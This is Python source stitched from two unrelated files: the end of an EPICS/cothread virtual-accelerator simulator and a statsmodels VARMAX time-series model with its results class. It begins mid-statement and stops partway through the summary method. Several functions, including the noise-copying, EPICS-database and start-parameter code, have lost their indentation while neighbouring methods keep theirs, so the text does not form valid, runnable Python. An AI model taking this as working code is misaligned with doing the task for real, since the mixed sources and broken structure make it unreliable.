                                type(elem).__name__)
        # Allow the BPM, PM, etc. readbacks to update
        # before the device setting readbacks PVs.
        cothread.Yield()
        for name, value in self._csetmap.items():
            name, field = self._fieldmap[name]
            _LOGGER.debug("VirtualAccelerator: Update read: %s to %s", value[1], settings[name][field])
            catools.caput(value[1], settings[name][field])
        # Sleep for a fraction (10%) of the total execution time
        # when one simulation costs more than 0.50 seconds.
        # Otherwise, sleep for the rest of 1 second.
        # If a scan is being done on this virtual accelerator,
        # then the scan server has a period of time to update
        # setpoints before the next run of IMPACT.
        if (time.time() - start) > 0.50:
            cothread.Sleep((time.time() - start) * 0.1)
        else:
            cothread.Sleep(1.0 - (time.time() - start))
def _handle_cset_monitor(self, value, idx):
    """Handle updates of CSET channels by updating
    the corresponding setting and RSET channel.

    :param value: new channel value from camonitor
    :param idx: index of the channel within the monitored CSET list
    """
    # NOTE(review): OrderedDict.items()[idx] is Python 2 only; a Python 3
    # port would need list(self._csetmap.items())[idx].
    cset = self._csetmap.items()[idx]
    _LOGGER.debug("VirtualAccelerator: Update cset: '%s' to %s", cset[0], value)
    name, field = self._fieldmap[cset[0]]
    # The RSET channel itself is refreshed by the _execute loop.
    self._settings[name][field] = float(value)
def _handle_noise_monitor(self, value):
    """Handle updates of the NOISE channel.

    :param value: new noise level; stored as float and applied by
        _copy_settings_with_noise() on the next simulation iteration
    """
    _LOGGER.debug("VirtualAccelerator: Update noise: %s", value)
    self._noise = float(value)
def _copy_settings_with_noise(self):
s = deepcopy(self._settings)
for name, field in self._fieldmap.values():
s[name][field] = s[name][field] + s[name][field] * self._noise * 2.0 * (random.random() - 0.5)
return s
def _write_epicsdb(self, buf):
for record in self._epicsdb:
buf.write("record({}, \"{}\") {{\r\n".format(record[0], record[1]))
for name, value in record[2].items():
if value is None:
pass # ignore fields with value None
elif isinstance(value, int):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
elif isinstance(value, float):
buf.write(" field(\"{}\", {})\r\n".format(name, value))
else:
buf.write(" field(\"{}\", \"{}\")\r\n".format(name, value))
buf.write("}\r\n\r\n")
def _normalize_phase(phase):
while phase >= 360.0:
phase -= 360.0
while phase < 0.0:
phase += 360.0
return phase
class _Cothread_Popen(object):
    """A helpful wrapper class that integrates the python
    standard popen() method with the Cothread library.

    Waiting on the child process happens in a real OS thread so that only
    the calling cothread blocks, not the whole cooperative scheduler.
    """
    def __init__(self, *args, **kwargs):
        # All arguments are passed straight through to subprocess.Popen.
        self._process = subprocess.Popen(*args, **kwargs)
        self._output = None  # (stdout, stderr) once communication completes
        self._event = None  # cothread.Event signalled when output is ready
    def communicate(self, input=None):  # @ReservedAssignment
        """Start a real OS thread to wait for process communication.

        Blocks the calling cothread until the child exits.

        :param input: optional data to send to the child's stdin (only valid
            on the first call)
        :return: tuple (stdout, stderr, returncode)
        :raises RuntimeError: if called again with input after the first call
        """
        if self._event is None:
            self._event = cothread.Event()
            threading.Thread(target=self._communicate_thread, args=(input,)).start()
        elif input is not None:
            raise RuntimeError("_Cothread_Popen: Communicate method already called")
        self._event.Wait()
        return (self._output[0], self._output[1], self._process.poll())
    def _communicate_thread(self, input):  # @ReservedAssignment
        """Executes in separate OS thread. Wait for communication
        then return the output to the cothread context.
        """
        output = self._process.communicate(input)
        # Callback marshals the result back onto the cothread scheduler.
        cothread.Callback(self._communicate_callback, output)
    def _communicate_callback(self, output):
        """Record the output and then signal other cothreads.
        """
        self._output = output
        self._event.Signal()
    def wait(self):
        """Wait for the process to complete and return the exit code.
        """
        self.communicate()
        return self._process.poll()
    def terminate(self):
        """Send the terminate signal. See subprocess.Popen.terminate()
        """
        self._process.terminate()
    def kill(self):
        """Send the kill signal. See subprocess.Popen.kill()
        """
        self._process.kill()
| |
"""
Vector Autoregressive Moving Average with eXogenous regressors model
Author: Chad Fulton
License: Simplified-BSD
"""
from __future__ import division, absolute_import, print_function
from warnings import warn
from statsmodels.compat.collections import OrderedDict
import pandas as pd
import numpy as np
from .kalman_filter import (
KalmanFilter, FilterResults, INVERT_UNIVARIATE, SOLVE_LU
)
from .mlemodel import MLEModel, MLEResults, MLEResultsWrapper
from .tools import (
companion_matrix, diff, is_invertible,
constrain_stationary_multivariate, unconstrain_stationary_multivariate
)
from statsmodels.tools.tools import Bunch
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.vector_ar import var_model
import statsmodels.base.wrapper as wrap
from statsmodels.tools.sm_exceptions import (EstimationWarning,
ValueWarning)
class VARMAX(MLEModel):
r"""
Vector Autoregressive Moving Average with eXogenous regressors model
Parameters
----------
endog : array_like
The observed time-series process :math:`y`, shaped nobs x k_endog.
exog : array_like, optional
Array of exogenous regressors, shaped nobs x k.
order : iterable
The (p,q) order of the model for the number of AR and MA parameters to
use.
trend : {'nc', 'c'}, optional
Parameter controlling the deterministic trend polynomial.
Can be specified as a string where 'c' indicates a constant intercept
and 'nc' indicates no intercept term.
error_cov_type : {'diagonal', 'unstructured'}, optional
The structure of the covariance matrix of the error term, where
"unstructured" puts no restrictions on the matrix and "diagonal"
requires it to be a diagonal matrix (uncorrelated errors). Default is
"unstructured".
measurement_error : boolean, optional
Whether or not to assume the endogenous observations `endog` were
measured with error. Default is False.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
enforce_invertibility : boolean, optional
Whether or not to transform the MA parameters to enforce invertibility
in the moving average component of the model. Default is True.
**kwargs
Keyword arguments may be used to provide default values for state space
matrices or for Kalman filtering options. See `Representation`, and
`KalmanFilter` for more details.
Attributes
----------
order : iterable
The (p,q) order of the model for the number of AR and MA parameters to
use.
trend : {'nc', 'c'}, optional
Parameter controlling the deterministic trend polynomial.
Can be specified as a string where 'c' indicates a constant intercept
and 'nc' indicates no intercept term.
error_cov_type : {'diagonal', 'unstructured'}, optional
The structure of the covariance matrix of the error term, where
"unstructured" puts no restrictions on the matrix and "diagonal"
requires it to be a diagonal matrix (uncorrelated errors). Default is
"unstructured".
measurement_error : boolean, optional
Whether or not to assume the endogenous observations `endog` were
measured with error. Default is False.
enforce_stationarity : boolean, optional
Whether or not to transform the AR parameters to enforce stationarity
in the autoregressive component of the model. Default is True.
enforce_invertibility : boolean, optional
Whether or not to transform the MA parameters to enforce invertibility
in the moving average component of the model. Default is True.
Notes
-----
Generically, the VARMAX model is specified (see for example chapter 18 of
[1]_):
.. math::
y_t = \nu + A_1 y_{t-1} + \dots + A_p y_{t-p} + B x_t + \epsilon_t +
M_1 \epsilon_{t-1} + \dots M_q \epsilon_{t-q}
where :math:`\epsilon_t \sim N(0, \Omega)`, and where :math:`y_t` is a
`k_endog x 1` vector. Additionally, this model allows considering the case
where the variables are measured with error.
Note that in the full VARMA(p,q) case there is a fundamental identification
problem in that the coefficient matrices :math:`\{A_i, M_j\}` are not
generally unique, meaning that for a given time series process there may
be multiple sets of matrices that equivalently represent it. See Chapter 12
of [1]_ for more information. Although this class can be used to estimate
VARMA(p,q) models, a warning is issued to remind users that no steps have
been taken to ensure identification in this case.
References
----------
.. [1] Lutkepohl, Helmut. 2007.
New Introduction to Multiple Time Series Analysis.
Berlin: Springer.
"""
    def __init__(self, endog, exog=None, order=(1, 0), trend='c',
                 error_cov_type='unstructured', measurement_error=False,
                 enforce_stationarity=True, enforce_invertibility=True,
                 **kwargs):
        """
        Construct the VARMAX state space model.

        See the class docstring for parameter descriptions. This validates
        the specification, builds the known (parameter-independent) parts of
        the state space matrices, lays out the packed parameter vector, and
        caches the index slices later used by `update`.
        """
        # Model parameters
        self.error_cov_type = error_cov_type
        self.measurement_error = measurement_error
        self.enforce_stationarity = enforce_stationarity
        self.enforce_invertibility = enforce_invertibility

        # Save the given orders
        self.order = order
        self.trend = trend

        # Model orders
        self.k_ar = int(order[0])
        self.k_ma = int(order[1])
        # k_trend is 1 for a constant intercept ('c'), 0 for none ('nc')
        self.k_trend = int(self.trend == 'c')

        # Check for valid model
        if trend not in ['c', 'nc']:
            raise ValueError('Invalid trend specification.')
        if error_cov_type not in ['diagonal', 'unstructured']:
            raise ValueError('Invalid error covariance matrix type'
                             ' specification.')
        if self.k_ar == 0 and self.k_ma == 0:
            raise ValueError('Invalid VARMAX(p,q) specification; at least one'
                             ' p,q must be greater than zero.')

        # Warn for VARMA model: the coefficient matrices of a full VARMA(p,q)
        # are not generally identified (see the class docstring)
        if self.k_ar > 0 and self.k_ma > 0:
            warn('Estimation of VARMA(p,q) models is not generically robust,'
                 ' due especially to identification issues.',
                 EstimationWarning)

        # Exogenous data
        self.k_exog = 0
        if exog is not None:
            exog_is_using_pandas = _is_using_pandas(exog, None)
            if not exog_is_using_pandas:
                exog = np.asarray(exog)

            # Make sure we have 2-dimensional array
            if exog.ndim == 1:
                if not exog_is_using_pandas:
                    exog = exog[:, None]
                else:
                    exog = pd.DataFrame(exog)

            self.k_exog = exog.shape[1]

        # Note: at some point in the future might add state regression, as in
        # SARIMAX.
        self.mle_regression = self.k_exog > 0

        # We need to have an array or pandas at this point
        if not _is_using_pandas(endog, None):
            endog = np.asanyarray(endog)

        # Model order
        # Used internally in various places; at least one AR block is kept in
        # the transition matrix even for a pure VMA model
        _min_k_ar = max(self.k_ar, 1)
        self._k_order = _min_k_ar + self.k_ma

        # Number of states
        k_endog = endog.shape[1]
        k_posdef = k_endog
        k_states = k_endog * self._k_order

        # By default, initialize as stationary
        kwargs.setdefault('initialization', 'stationary')

        # By default, use LU decomposition
        kwargs.setdefault('inversion_method', INVERT_UNIVARIATE | SOLVE_LU)

        # Initialize the state space model
        super(VARMAX, self).__init__(
            endog, exog=exog, k_states=k_states, k_posdef=k_posdef, **kwargs
        )

        # Initialize the parameters: maps parameter-block name -> block length
        # in the packed parameter vector (order matters)
        self.parameters = OrderedDict()
        self.parameters['trend'] = self.k_endog * self.k_trend
        self.parameters['ar'] = self.k_endog**2 * self.k_ar
        self.parameters['ma'] = self.k_endog**2 * self.k_ma
        self.parameters['regression'] = self.k_endog * self.k_exog
        if self.error_cov_type == 'diagonal':
            self.parameters['state_cov'] = self.k_endog
        # These parameters fill in a lower-triangular matrix which is then
        # dotted with itself to get a positive definite matrix.
        elif self.error_cov_type == 'unstructured':
            self.parameters['state_cov'] = (
                int(self.k_endog * (self.k_endog + 1) / 2)
            )
        # boolean multiplication: zero obs_cov parameters unless
        # measurement_error is True
        self.parameters['obs_cov'] = self.k_endog * self.measurement_error
        self.k_params = sum(self.parameters.values())

        # Initialize known elements of the state space matrices

        # If we have exog effects, then the state intercept needs to be
        # time-varying
        if self.k_exog > 0:
            self.ssm['state_intercept'] = np.zeros((self.k_states, self.nobs))

        # The design matrix is just an identity for the first k_endog states
        idx = np.diag_indices(self.k_endog)
        self.ssm[('design',) + idx] = 1

        # The transition matrix is described in four blocks, where the upper
        # left block is in companion form with the autoregressive coefficient
        # matrices (so it is shaped k_endog * k_ar x k_endog * k_ar) ...
        if self.k_ar > 0:
            idx = np.diag_indices((self.k_ar - 1) * self.k_endog)
            idx = idx[0] + self.k_endog, idx[1]
            self.ssm[('transition',) + idx] = 1
        # ... and the lower right block is in companion form with zeros as the
        # coefficient matrices (it is shaped k_endog * k_ma x k_endog * k_ma).
        idx = np.diag_indices((self.k_ma - 1) * self.k_endog)
        idx = (idx[0] + (_min_k_ar + 1) * self.k_endog,
               idx[1] + _min_k_ar * self.k_endog)
        self.ssm[('transition',) + idx] = 1

        # The selection matrix is described in two blocks, where the upper
        # block selects the all k_posdef errors in the first k_endog rows
        # (the upper block is shaped k_endog * k_ar x k) and the lower block
        # also selects all k_posdef errors in the first k_endog rows (the lower
        # block is shaped k_endog * k_ma x k).
        idx = np.diag_indices(self.k_endog)
        self.ssm[('selection',) + idx] = 1
        idx = idx[0] + _min_k_ar * self.k_endog, idx[1]
        if self.k_ma > 0:
            self.ssm[('selection',) + idx] = 1

        # Cache some indices
        if self.trend == 'c' and self.k_exog == 0:
            # Time-invariant state intercept (constant only)
            self._idx_state_intercept = np.s_['state_intercept', :k_endog]
        elif self.k_exog > 0:
            # Time-varying state intercept (regression effects)
            self._idx_state_intercept = np.s_['state_intercept', :k_endog, :]
        if self.k_ar > 0:
            self._idx_transition = np.s_['transition', :k_endog, :]
        else:
            self._idx_transition = np.s_['transition', :k_endog, k_endog:]
        if self.error_cov_type == 'diagonal':
            self._idx_state_cov = (
                ('state_cov',) + np.diag_indices(self.k_endog))
        elif self.error_cov_type == 'unstructured':
            self._idx_lower_state_cov = np.tril_indices(self.k_endog)
        if self.measurement_error:
            self._idx_obs_cov = ('obs_cov',) + np.diag_indices(self.k_endog)

        # Cache some slices: each _slice call consumes the next `length`
        # entries of the packed parameter vector, in `parameters` order
        def _slice(key, offset):
            length = self.parameters[key]
            param_slice = np.s_[offset:offset + length]
            offset += length
            return param_slice, offset

        offset = 0
        self._params_trend, offset = _slice('trend', offset)
        self._params_ar, offset = _slice('ar', offset)
        self._params_ma, offset = _slice('ma', offset)
        self._params_regression, offset = _slice('regression', offset)
        self._params_state_cov, offset = _slice('state_cov', offset)
        self._params_obs_cov, offset = _slice('obs_cov', offset)
def filter(self, params, **kwargs):
kwargs.setdefault('results_class', VARMAXResults)
kwargs.setdefault('results_wrapper_class', VARMAXResultsWrapper)
return super(VARMAX, self).filter(params, **kwargs)
def smooth(self, params, **kwargs):
kwargs.setdefault('results_class', VARMAXResults)
kwargs.setdefault('results_wrapper_class', VARMAXResultsWrapper)
return super(VARMAX, self).smooth(params, **kwargs)
@property
def start_params(self):
params = np.zeros(self.k_params, dtype=np.float64)
# A. Run a multivariate regression to get beta estimates
endog = self.endog.copy()
exog = self.exog.copy() if self.k_exog > 0 else None
# Although the Kalman filter can deal with missing values in endog,
# conditional sum of squares cannot
if np.any(np.isnan(endog)):
endog = endog[~np.isnan(endog)]
if exog is not None:
exog = exog[~np.isnan(endog)]
# Regression effects via OLS
exog_params = np.zeros(0)
if self.k_exog > 0:
exog_params = np.linalg.pinv(exog).dot(endog).T
endog -= np.dot(exog, exog_params.T)
# B. Run a VAR model on endog to get trend, AR parameters
ar_params = []
k_ar = self.k_ar if self.k_ar > 0 else 1
mod_ar = var_model.VAR(endog)
res_ar = mod_ar.fit(maxlags=k_ar, ic=None, trend=self.trend)
ar_params = np.array(res_ar.params.T)
if self.trend == 'c':
trend_params = ar_params[:, 0]
if self.k_ar > 0:
ar_params = ar_params[:, 1:].ravel()
else:
ar_params = []
elif self.k_ar > 0:
ar_params = ar_params.ravel()
else:
ar_params = []
endog = res_ar.resid
# Test for stationarity
if self.k_ar > 0 and self.enforce_stationarity:
coefficient_matrices = (
ar_params.reshape(
self.k_endog * self.k_ar, self.k_endog
).T
).reshape(self.k_endog, self.k_endog, self.k_ar).T
stationary = is_invertible([1] + list(-coefficient_matrices))
if not stationary:
raise ValueError('Non-stationary starting autoregressive'
' parameters found with `enforce_stationarity`'
' set to True.')
# C. Run a VAR model on the residuals to get MA parameters
ma_params = []
if self.k_ma > 0:
mod_ma = var_model.VAR(endog)
res_ma = mod_ma.fit(maxlags=self.k_ma, ic=None, trend='nc')
ma_params = np.array(res_ma.params.T).ravel()
# Test for invertibility
if self.enforce_invertibility:
coefficient_matrices = (
ma_params.reshape(
self.k_endog * self.k_ma, self.k_endog
).T
).reshape(self.k_endog, self.k_endog, self.k_ma).T
invertible = is_invertible([1] + list(-coefficient_matrices))
if not invertible:
raise ValueError('Non-invertible starting moving-average'
' parameters found with `enforce_stationarity`'
' set to True.')
# 1. Intercept terms
if self.trend == 'c':
params[self._params_trend] = trend_params
# 2. AR terms
params[self._params_ar] = ar_params
# 3. MA terms
params[self._params_ma] = ma_params
# 4. Regression terms
if self.mle_regression:
params[self._params_regression] = exog_params.ravel()
# 5. State covariance terms
if self.error_cov_type == 'diagonal':
params[self._params_state_cov] = res_ar.sigma_u.diagonal()
elif self.error_cov_type == 'unstructured':
cov_factor = np.linalg.cholesky(res_ar.sigma_u)
params[self._params_state_cov] = (
cov_factor[self._idx_lower_state_cov].ravel())
# 5. Measurement error variance terms
if self.measurement_error:
if self.k_ma > 0:
params[self._params_obs_cov] = res_ma.sigma_u.diagonal()
else:
params[self._params_obs_cov] = res_ar.sigma_u.diagonal()
return params
@property
def param_names(self):
param_names = []
# 1. Intercept terms
if self.trend == 'c':
param_names += [
'const.%s' % self.endog_names[i]
for i in range(self.k_endog)
]
# 2. AR terms
param_names += [
'L%d.%s.%s' % (i+1, self.endog_names[k], self.endog_names[j])
for j in range(self.k_endog)
for i in range(self.k_ar)
for k in range(self.k_endog)
]
# 3. MA terms
param_names += [
'L%d.e(%s).%s' % (i+1, self.endog_names[k], self.endog_names[j])
for j in range(self.k_endog)
for i in range(self.k_ma)
for k in range(self.k_endog)
]
# 4. Regression terms
param_names += [
'beta.%s.%s' % (self.exog_names[j], self.endog_names[i])
for i in range(self.k_endog)
for j in range(self.k_exog)
]
# 5. State covariance terms
if self.error_cov_type == 'diagonal':
param_names += [
'sigma2.%s' % self.endog_names[i]
for i in range(self.k_endog)
]
elif self.error_cov_type == 'unstructured':
param_names += [
('sqrt.var.%s' % self.endog_names[i] if i == j else
'sqrt.cov.%s.%s' % (self.endog_names[j], self.endog_names[i]))
for i in range(self.k_endog)
for j in range(i+1)
]
# 5. Measurement error variance terms
if self.measurement_error:
param_names += [
'measurement_variance.%s' % self.endog_names[i]
for i in range(self.k_endog)
]
return param_names
    def transform_params(self, unconstrained):
        """
        Transform unconstrained parameters used by the optimizer to constrained
        parameters used in likelihood evaluation

        Parameters
        ----------
        unconstrained : array_like
            Array of unconstrained parameters used by the optimizer, to be
            transformed.

        Returns
        -------
        constrained : array_like
            Array of constrained parameters which may be used in likelihood
            evaluation.

        Notes
        -----
        Constrains the factor transition to be stationary and variances to be
        positive.
        """
        unconstrained = np.array(unconstrained, ndmin=1)
        constrained = np.zeros(unconstrained.shape, dtype=unconstrained.dtype)

        # 1. Intercept terms: nothing to do
        constrained[self._params_trend] = unconstrained[self._params_trend]

        # 2. AR terms: optionally force to be stationary
        if self.k_ar > 0 and self.enforce_stationarity:
            # Create the state covariance matrix (needed by the stationarity
            # transformation; built from the *unconstrained* parameters)
            if self.error_cov_type == 'diagonal':
                state_cov = np.diag(unconstrained[self._params_state_cov]**2)
            elif self.error_cov_type == 'unstructured':
                state_cov_lower = np.zeros(self.ssm['state_cov'].shape,
                                           dtype=unconstrained.dtype)
                state_cov_lower[self._idx_lower_state_cov] = (
                    unconstrained[self._params_state_cov])
                state_cov = np.dot(state_cov_lower, state_cov_lower.T)

            # Transform the parameters
            coefficients = unconstrained[self._params_ar].reshape(
                self.k_endog, self.k_endog * self.k_ar)
            coefficient_matrices, variance = (
                constrain_stationary_multivariate(coefficients, state_cov))
            constrained[self._params_ar] = coefficient_matrices.ravel()
        else:
            constrained[self._params_ar] = unconstrained[self._params_ar]

        # 3. MA terms: optionally force to be invertible
        if self.k_ma > 0 and self.enforce_invertibility:
            # Transform the parameters, using an identity variance matrix
            state_cov = np.eye(self.k_endog, dtype=unconstrained.dtype)
            coefficients = unconstrained[self._params_ma].reshape(
                self.k_endog, self.k_endog * self.k_ma)
            coefficient_matrices, variance = (
                constrain_stationary_multivariate(coefficients, state_cov))
            constrained[self._params_ma] = coefficient_matrices.ravel()
        else:
            constrained[self._params_ma] = unconstrained[self._params_ma]

        # 4. Regression terms: nothing to do
        constrained[self._params_regression] = (
            unconstrained[self._params_regression])

        # 5. State covariance terms
        # If we have variances, force them to be positive
        if self.error_cov_type == 'diagonal':
            constrained[self._params_state_cov] = (
                unconstrained[self._params_state_cov]**2)
        # Otherwise, nothing needs to be done (the parameters are entries of a
        # Cholesky factor, which is unrestricted)
        elif self.error_cov_type == 'unstructured':
            constrained[self._params_state_cov] = (
                unconstrained[self._params_state_cov])

        # 6. Measurement error variance terms
        if self.measurement_error:
            # Force these to be positive
            constrained[self._params_obs_cov] = (
                unconstrained[self._params_obs_cov]**2)

        return constrained
    def untransform_params(self, constrained):
        """
        Transform constrained parameters used in likelihood evaluation
        to unconstrained parameters used by the optimizer.

        Parameters
        ----------
        constrained : array_like
            Array of constrained parameters used in likelihood evaluation, to
            be transformed.

        Returns
        -------
        unconstrained : array_like
            Array of unconstrained parameters used by the optimizer.
        """
        constrained = np.array(constrained, ndmin=1)
        unconstrained = np.zeros(constrained.shape, dtype=constrained.dtype)

        # 1. Intercept terms: nothing to do
        unconstrained[self._params_trend] = constrained[self._params_trend]

        # 2. AR terms: optionally were forced to be stationary
        if self.k_ar > 0 and self.enforce_stationarity:
            # Create the state covariance matrix (inverse of the construction
            # in `transform_params`; here the parameters are already
            # constrained, so the diagonal entries are used directly)
            if self.error_cov_type == 'diagonal':
                state_cov = np.diag(constrained[self._params_state_cov])
            elif self.error_cov_type == 'unstructured':
                state_cov_lower = np.zeros(self.ssm['state_cov'].shape,
                                           dtype=constrained.dtype)
                state_cov_lower[self._idx_lower_state_cov] = (
                    constrained[self._params_state_cov])
                state_cov = np.dot(state_cov_lower, state_cov_lower.T)

            # Transform the parameters
            coefficients = constrained[self._params_ar].reshape(
                self.k_endog, self.k_endog * self.k_ar)
            unconstrained_matrices, variance = (
                unconstrain_stationary_multivariate(coefficients, state_cov))
            unconstrained[self._params_ar] = unconstrained_matrices.ravel()
        else:
            unconstrained[self._params_ar] = constrained[self._params_ar]

        # 3. MA terms: optionally were forced to be invertible
        if self.k_ma > 0 and self.enforce_invertibility:
            # Transform the parameters, using an identity variance matrix
            state_cov = np.eye(self.k_endog, dtype=constrained.dtype)
            coefficients = constrained[self._params_ma].reshape(
                self.k_endog, self.k_endog * self.k_ma)
            unconstrained_matrices, variance = (
                unconstrain_stationary_multivariate(coefficients, state_cov))
            unconstrained[self._params_ma] = unconstrained_matrices.ravel()
        else:
            unconstrained[self._params_ma] = constrained[self._params_ma]

        # 4. Regression terms: nothing to do
        unconstrained[self._params_regression] = (
            constrained[self._params_regression])

        # 5. State covariance terms
        # If we have variances, then these were forced to be positive
        if self.error_cov_type == 'diagonal':
            unconstrained[self._params_state_cov] = (
                constrained[self._params_state_cov]**0.5)
        # Otherwise, nothing needs to be done
        elif self.error_cov_type == 'unstructured':
            unconstrained[self._params_state_cov] = (
                constrained[self._params_state_cov])

        # 6. Measurement error variance terms
        if self.measurement_error:
            # These were forced to be positive
            unconstrained[self._params_obs_cov] = (
                constrained[self._params_obs_cov]**0.5)

        return unconstrained
    def update(self, params, **kwargs):
        """
        Update the state space representation to reflect the given parameters.

        Parameters
        ----------
        params : array_like
            Packed (constrained) parameter vector, laid out as
            trend, AR, MA, regression, state covariance, observation
            covariance (see the `parameters` dict built in `__init__`).
        **kwargs
            Passed through to the parent class `update`.
        """
        params = super(VARMAX, self).update(params, **kwargs)

        # 1. State intercept
        if self.mle_regression:
            # Time-varying intercept: exog effects plus (optionally) constant
            exog_params = params[self._params_regression].reshape(
                self.k_endog, self.k_exog).T
            intercept = np.dot(self.exog, exog_params)
            if self.trend == 'c':
                intercept += params[self._params_trend]
            self.ssm[self._idx_state_intercept] = intercept.T
        elif self.trend == 'c':
            self.ssm[self._idx_state_intercept] = params[self._params_trend]

        # 2. Transition: fill the first k_endog rows with the AR and MA
        # coefficient matrices, side by side
        ar = params[self._params_ar].reshape(
            self.k_endog, self.k_endog * self.k_ar)
        ma = params[self._params_ma].reshape(
            self.k_endog, self.k_endog * self.k_ma)
        self.ssm[self._idx_transition] = np.c_[ar, ma]

        # 3. State covariance
        if self.error_cov_type == 'diagonal':
            self.ssm[self._idx_state_cov] = (
                params[self._params_state_cov]
            )
        elif self.error_cov_type == 'unstructured':
            # Parameters are the lower Cholesky factor; rebuild L L'
            state_cov_lower = np.zeros(self.ssm['state_cov'].shape,
                                       dtype=params.dtype)
            state_cov_lower[self._idx_lower_state_cov] = (
                params[self._params_state_cov])
            self.ssm['state_cov'] = np.dot(state_cov_lower, state_cov_lower.T)

        # 4. Observation covariance
        if self.measurement_error:
            self.ssm[self._idx_obs_cov] = params[self._params_obs_cov]
class VARMAXResults(MLEResults):
    """
    Class to hold results from fitting a VARMAX model.

    Parameters
    ----------
    model : VARMAX instance
        The fitted model instance

    Attributes
    ----------
    specification : dictionary
        Dictionary including all attributes from the VARMAX model instance.
    coefficient_matrices_var : array
        Array containing autoregressive lag polynomial coefficient matrices,
        ordered from lowest degree to highest.
    coefficient_matrices_vma : array
        Array containing moving average lag polynomial coefficients,
        ordered from lowest degree to highest.

    See Also
    --------
    statsmodels.tsa.statespace.kalman_filter.FilterResults
    statsmodels.tsa.statespace.mlemodel.MLEResults
    """
    def __init__(self, model, params, filter_results, cov_type='opg',
                 **kwargs):
        super(VARMAXResults, self).__init__(model, params, filter_results,
                                            cov_type, **kwargs)

        self.df_resid = np.inf  # attribute required for wald tests

        self.specification = Bunch(**{
            # Set additional model parameters
            'error_cov_type': self.model.error_cov_type,
            'measurement_error': self.model.measurement_error,
            'enforce_stationarity': self.model.enforce_stationarity,
            'enforce_invertibility': self.model.enforce_invertibility,
            'order': self.model.order,

            # Model order
            'k_ar': self.model.k_ar,
            'k_ma': self.model.k_ma,

            # Trend / Regression
            'trend': self.model.trend,
            'k_trend': self.model.k_trend,
            'k_exog': self.model.k_exog,
        })

        # Polynomials / coefficient matrices: unpack the flat AR / MA
        # parameter vectors into (k_endog x k_endog) lag coefficient matrices
        self.coefficient_matrices_var = None
        self.coefficient_matrices_vma = None
        if self.model.k_ar > 0:
            ar_params = np.array(self.params[self.model._params_ar])
            k_endog = self.model.k_endog
            k_ar = self.model.k_ar
            self.coefficient_matrices_var = (
                ar_params.reshape(k_endog * k_ar, k_endog).T
            ).reshape(k_endog, k_endog, k_ar).T
        if self.model.k_ma > 0:
            ma_params = np.array(self.params[self.model._params_ma])
            k_endog = self.model.k_endog
            k_ma = self.model.k_ma
            self.coefficient_matrices_vma = (
                ma_params.reshape(k_endog * k_ma, k_endog).T
            ).reshape(k_endog, k_endog, k_ma).T

    def predict(self, start=None, end=None, exog=None, dynamic=False,
                **kwargs):
        """
        In-sample prediction and out-of-sample forecasting

        Parameters
        ----------
        start : int, str, or datetime, optional
            Zero-indexed observation number at which to start forecasting, ie.,
            the first forecast is start. Can also be a date string to
            parse or a datetime type. Default is the zeroth observation.
        end : int, str, or datetime, optional
            Zero-indexed observation number at which to end forecasting, ie.,
            the first forecast is start. Can also be a date string to
            parse or a datetime type. However, if the dates index does not
            have a fixed frequency, end must be an integer index if you
            want out of sample prediction. Default is the last observation in
            the sample.
        exog : array_like, optional
            If the model includes exogenous regressors, you must provide
            exactly enough out-of-sample values for the exogenous variables if
            end is beyond the last observation in the sample.
        dynamic : boolean, int, str, or datetime, optional
            Integer offset relative to `start` at which to begin dynamic
            prediction. Can also be an absolute date string to parse or a
            datetime type (these are not interpreted as offsets).
            Prior to this observation, true endogenous values will be used for
            prediction; starting with this observation and continuing through
            the end of prediction, forecasted endogenous values will be used
            instead.
        **kwargs
            Additional arguments may be required for forecasting beyond the
            end of the sample. See `FilterResults.predict` for more details.

        Returns
        -------
        forecast : array
            Array of out of sample forecasts.
        """
        if start is None:
            start = 0

        # Handle end (e.g. date)
        _start = self.model._get_predict_start(start)
        _end, _out_of_sample = self.model._get_predict_end(end)

        # Handle exogenous parameters
        if _out_of_sample and (self.model.k_exog + self.model.k_trend > 0):
            # Create a new faux VARMAX model for the extended dataset
            # (the endog values are dummies; only the time-varying state space
            # matrices implied by the extended exog are used below)
            nobs = self.model.data.orig_endog.shape[0] + _out_of_sample
            endog = np.zeros((nobs, self.model.k_endog))

            if self.model.k_exog > 0:
                if exog is None:
                    raise ValueError('Out-of-sample forecasting in a model'
                                     ' with a regression component requires'
                                     ' additional exogenous values via the'
                                     ' `exog` argument.')
                exog = np.array(exog)
                required_exog_shape = (_out_of_sample, self.model.k_exog)
                if not exog.shape == required_exog_shape:
                    raise ValueError('Provided exogenous values are not of the'
                                     ' appropriate shape. Required %s, got %s.'
                                     % (str(required_exog_shape),
                                        str(exog.shape)))
                exog = np.c_[self.model.data.orig_exog.T, exog.T].T

            # TODO replace with init_kwds or specification or similar
            model = VARMAX(
                endog,
                exog=exog,
                order=self.model.order,
                trend=self.model.trend,
                error_cov_type=self.model.error_cov_type,
                measurement_error=self.model.measurement_error,
                enforce_stationarity=self.model.enforce_stationarity,
                enforce_invertibility=self.model.enforce_invertibility
            )
            model.update(self.params)

            # Set the kwargs with the update time-varying state space
            # representation matrices
            for name in self.filter_results.shapes.keys():
                if name == 'obs':
                    continue
                mat = getattr(model.ssm, name)
                if mat.shape[-1] > 1:
                    if len(mat.shape) == 2:
                        kwargs[name] = mat[:, -_out_of_sample:]
                    else:
                        kwargs[name] = mat[:, :, -_out_of_sample:]
        elif self.model.k_exog == 0 and exog is not None:
            warn('Exogenous array provided to predict, but additional data not'
                 ' required. `exog` argument ignored.', ValueWarning)

        return super(VARMAXResults, self).predict(
            start=start, end=end, exog=exog, dynamic=dynamic, **kwargs
        )

    def forecast(self, steps=1, exog=None, **kwargs):
        """
        Out-of-sample forecasts

        Parameters
        ----------
        steps : int, optional
            The number of out of sample forecasts from the end of the
            sample. Default is 1.
        exog : array_like, optional
            If the model includes exogenous regressors, you must provide
            exactly enough out-of-sample values for the exogenous variables for
            each step forecasted.
        **kwargs
            Additional arguments may be required for forecasting beyond the
            end of the sample. See `FilterResults.predict` for more details.

        Returns
        -------
        forecast : array
            Array of out of sample forecasts.
        """
        return super(VARMAXResults, self).forecast(steps, exog=exog, **kwargs)

    def summary(self, alpha=.05, start=None, separate_params=True):
        from statsmodels.iolib.summary import summary_params

        # Create the model name
        spec = self.specification
        if spec.k_ar > 0 and spec.k_ma > 0:
            model_name = 'VARMA'
            order = '(%s,%s)' % (spec.k_ar, spec.k_ma)
        elif spec.k_ar > 0:
            model_name = 'VAR'
